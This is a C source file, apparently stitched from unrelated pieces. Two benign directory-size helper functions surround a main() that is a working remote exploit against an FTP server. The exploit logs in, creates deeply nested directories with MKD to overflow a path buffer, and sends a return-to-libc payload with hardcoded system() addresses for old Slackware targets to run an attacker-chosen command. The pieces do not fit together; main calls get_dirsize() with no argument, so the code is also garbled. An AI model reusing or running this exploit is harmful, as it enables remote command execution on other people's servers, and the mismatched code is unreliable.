double get_dirsize(const char *pPath)
{
DIR *dp = opendir(pPath);
if (dp == NULL)
return 0;
struct dirent *ep;
struct stat statbuf;
double size = 0;
while ((ep = readdir(dp)) != NULL)
{
if (dot_or_dotdot(ep->d_name))
continue;
char *dname = concat_path_file(pPath, ep->d_name);
if (lstat(dname, &statbuf) != 0)
{
goto next;
}
if (S_ISDIR(statbuf.st_mode))
{
size += get_dirsize(dname);
}
else if (S_ISREG(statbuf.st_mode))
{
size += statbuf.st_size;
}
next:
free(dname);
}
closedir(dp);
return size;
}
int main (int argc, char *argv[]) {
if (argc < 7) {
usage(argv[0]);
exit(0);
}
sprintf(host, "%s", argv[1]);
sprintf(user, "%s", argv[2]);
sprintf(pass, "%s", argv[3]);
sprintf(dir, "%s", argv[4]);
sprintf(command, "%s", argv[5]);
tipo = atoi (argv[6]);
printf ( "%d\n\n", tipo);
if ( argc > 7) port = atoi(argv[7]);
if ( argc > 8) align = atoi(argv[8]);
if (tipo <= 0) {
/* 2.4(4) libc5 slack 3.4 */
systemaddr = 0x400441f0;
shelladdr = 0x80604a0;
} else if (tipo == 1) {
/* beta 15 libc5 slack 3.4 */
systemaddr = 0x400441f0;
shelladdr = 0x8062510;
} else if (tipo == 2) {
/* 2.4(4) libc5 slack 3.3 */
systemaddr = 0x400441f0;
shelladdr = 0x805f1e4;
} else {
/* CUSTOM ADDRESS */
systemaddr = SYSADDR;
shelladdr = EGGADDR;
}
sd = socket ( AF_INET, SOCK_STREAM, 0);
sa.sin_family = AF_INET;
sa.sin_port = htons(port);
he = gethostbyname (host);
if (!he) {
if ( (sa.sin_addr.s_addr = inet_addr(host)) == INADDR_NONE) {
printf ( "wrong ip address or unknown hostname\n"); exit(0);
}
}
else {
bcopy ( he->h_addr, (struct in_addr *) &sa.sin_addr, he->h_length);
}
if ( connect ( sd, (struct sockaddr *) &sa, sizeof(sa)) < 0) {
printf ( "Cannot connect to remote host: Connection refused\n");
exit(0);
}
read ( sd, netbuf, sizeof(netbuf));
printf ( "%s\n", netbuf); bzero ( &netbuf, sizeof(netbuf));
/* ok. we're connected. */
strcpy ( tmp, "USER "); strcat (tmp, user); strcat ( tmp, "\n");
write ( sd, tmp, strlen(tmp)); bzero ( &tmp, sizeof(tmp));
read ( sd, netbuf, sizeof(netbuf));
printf ( "%s\n", netbuf); bzero ( &netbuf, sizeof(netbuf));
/* ok. send the pass. */
strcpy ( tmp, "PASS "); strcat (tmp, pass); strcat ( tmp, "\n");
write ( sd, tmp, strlen(tmp)); bzero ( &tmp, sizeof(tmp));
read ( sd, netbuf, sizeof(netbuf));
if ( netbuf[0] == '5') {
printf ("Login incorrect!\n"); exit(0); }
printf ( "%s\n", netbuf);
#ifdef DEBUG
printf ( "Ok, we're on! Press any key to exploit it\n");
gets(netbuf);
#endif
bzero ( &netbuf, sizeof(netbuf));
/* ok. let's get to the vulnerable dir */
strcpy ( tmp, "CWD "); strcat (tmp, dir); strcat ( tmp, "\n");
write ( sd, tmp, strlen(tmp)); bzero ( &tmp, sizeof(tmp));
read ( sd, netbuf, sizeof(netbuf));
printf ( "%s\n", netbuf); bzero ( &netbuf, sizeof(netbuf));
get_dirsize(); /* gets home dir size */
todo = BSIZE - dirsize - 60 - 4;
/* ok, we're on. let's get things working here! */
while(done < todo) {
if((todo - done) > 255)
doit = 255;
else
doit = todo - done;
for (i = 0; i < doit; i++)
buff[i] = c;
buff[doit] = '\0';
strcpy ( tmp, "MKD "); strcat ( tmp, buff); strcat ( tmp, "\n");
write ( sd, tmp, strlen(tmp));
read ( sd, netbuf, sizeof(netbuf));
if ( netbuf[1] == '2') {
printf ("error while creating the dir, let's try another name...\n\n");
c++;
continue;
}
else
done += doit;
bzero ( &tmp, sizeof(tmp)); bzero ( &netbuf, sizeof(netbuf));
strcpy ( tmp, "CWD "); strcat ( tmp, buff); strcat ( tmp, "\n");
write ( sd, tmp, strlen(tmp));
read ( sd, netbuf, sizeof(netbuf));
if ( netbuf[0] == '5') {
printf ("error while exploiting the remote host: Cannot cd dir!\n\n");
}
bzero ( &tmp, sizeof(tmp)); bzero ( &netbuf, sizeof(netbuf));
}
/* prepare last one */
memset(buff, 'X', MAXLEN);
for(i = align; i < 100; i += 4) {
buff[i ] = systemaddr & 0x000000ff;
buff[i+1] = (systemaddr & 0x0000ff00) >> 8;
buff[i+2] = (systemaddr & 0x00ff0000) >> 16;
buff[i+3] = (systemaddr & 0xff000000) >> 24;
}
buff[i++] = shelladdr & 0x000000ff;
buff[i++] = (shelladdr & 0x0000ff00) >> 8;
buff[i++] = (shelladdr & 0x00ff0000) >> 16;
buff[i++] = (shelladdr & 0xff000000) >> 24;
strcat(command, ";");
memcpy(buff+140, command, strlen(command));
buff[MAXLEN] = '\0';
strcpy ( tmp, "MKD "); strcat ( tmp, buff); strcat ( tmp, "\n");
write ( sd, tmp, strlen(tmp));
read ( sd, netbuf, sizeof(netbuf));
bzero ( &tmp, sizeof(tmp)); bzero ( &netbuf, sizeof(netbuf));
/* ok. */
printf ( "Exploiting %s\n", dir);
printf ( "Using 0x%x(system) and 0x%x(command), alignment = %d, port = %d\n", systemaddr, shelladdr, align, port);
printf("\nI guess you're a hax0r now :D.\n");
close (sd);
}
double get_dirsize_find_largest_dir(
const char *pPath,
char **worst_dir,
const char *excluded)
{
if (worst_dir)
*worst_dir = NULL;
DIR *dp = opendir(pPath);
if (dp == NULL)
return 0;
time_t cur_time = time(NULL);
struct dirent *ep;
struct stat statbuf;
double size = 0;
double maxsz = 0;
while ((ep = readdir(dp)) != NULL)
{
if (dot_or_dotdot(ep->d_name))
continue;
char *dname = concat_path_file(pPath, ep->d_name);
if (lstat(dname, &statbuf) != 0)
{
goto next;
}
if (S_ISDIR(statbuf.st_mode))
{
double sz = get_dirsize(dname);
size += sz;
if (worst_dir && (!excluded || strcmp(excluded, ep->d_name) != 0))
{
/* Calculate "weighted" size and age
* w = sz_kbytes * age_mins
*/
sz /= 1024;
long age = (cur_time - statbuf.st_mtime) / 60;
if (age > 0)
sz *= age;
if (sz > maxsz)
{
if (!this_is_a_dd(dname))
{
VERB1 log("'%s' isn't a problem directory, probably a stray directory?", dname);
}
else
{
maxsz = sz;
free(*worst_dir);
*worst_dir = xstrdup(ep->d_name);
}
}
}
}
else if (S_ISREG(statbuf.st_mode))
{
size += statbuf.st_size;
}
next:
free(dname);
}
closedir(dp);
return size;
}
